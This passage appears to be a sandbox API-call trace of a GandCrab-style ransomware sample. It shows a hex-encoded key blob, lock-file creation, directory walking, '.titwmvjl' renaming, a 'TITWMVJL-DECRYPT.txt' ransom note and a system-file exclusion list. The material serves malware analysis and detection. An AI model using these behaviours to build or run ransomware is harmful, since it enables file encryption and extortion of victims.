x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0073.491] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0073.492] CloseHandle (hObject=0x2cc) returned 1 [0073.492] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.493] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.493] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x12, wMilliseconds=0x329)) [0073.493] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.493] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.493] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.493] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.493] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\systemcertificates\\my\\ctls\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0073.495] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.495] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\") returned 75 [0073.496] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0073.496] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x503938 [0073.496] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.496] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.496] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.496] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.496] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.496] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.496] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.496] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock" [0073.496] lstrlenW (lpString=".titwmvjl") returned 9 [0073.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.496] VirtualAlloc (lpAddress=0x0, dwSize=0x106, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.496] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 108 [0073.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\d2ca4a09d2ca4deb61a.lock") returned 99 [0073.496] lstrlenW (lpString=".lock") returned 5 [0073.496] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.497] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.497] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.497] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.497] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0073.497] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.497] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.497] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt" [0073.497] lstrlenW (lpString=".titwmvjl") returned 9 [0073.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.497] VirtualAlloc (lpAddress=0x0, dwSize=0xfe, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.498] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 104 [0073.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.498] lstrlenW (lpString=".txt") returned 4 [0073.498] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.498] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.498] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.498] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.498] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\TITWMVJL-DECRYPT.txt") returned 95 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.498] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.498] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.499] FindNextFileW (in: hFindFile=0x503938, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0073.499] FindClose (in: hFindFile=0x503938 | out: hFindFile=0x503938) returned 1 [0073.499] CloseHandle (hObject=0x2cc) returned 1 [0073.499] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.499] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0073.499] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0073.499] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock" [0073.499] lstrlenW (lpString=".titwmvjl") returned 9 [0073.499] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock") returned 94 [0073.499] VirtualAlloc (lpAddress=0x0, dwSize=0xfc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.500] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 103 [0073.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\d2ca4a09d2ca4deb61a.lock") returned 94 [0073.500] lstrlenW (lpString=".lock") returned 5 [0073.500] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.500] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0073.500] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.500] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.500] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0073.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.500] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.500] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt" [0073.500] lstrlenW (lpString=".titwmvjl") returned 9 [0073.500] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt") returned 90 [0073.500] VirtualAlloc (lpAddress=0x0, dwSize=0xf4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.500] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 99 [0073.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt") returned 90 [0073.501] lstrlenW (lpString=".txt") returned 4 [0073.501] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.501] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.501] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.501] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt") returned 90 [0073.501] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\TITWMVJL-DECRYPT.txt") returned 90 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0073.501] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0073.501] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.501] FindNextFileW (in: hFindFile=0x503338, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0073.501] FindClose (in: hFindFile=0x503338 | out: hFindFile=0x503338) returned 1 [0073.502] CloseHandle (hObject=0x2c4) returned 1 [0073.502] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0073.502] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0073.502] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0073.502] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt" [0073.502] lstrlenW (lpString=".titwmvjl") returned 9 [0073.502] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt") returned 87 [0073.502] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0073.503] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 96 [0073.503] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt") returned 87 [0073.503] lstrlenW (lpString=".txt") returned 4 [0073.503] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0073.503] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0073.503] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0073.503] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.503] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt") returned 87 [0073.503] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\SystemCertificates\\TITWMVJL-DECRYPT.txt") returned 87 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0073.503] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0073.503] lstrcmpiW 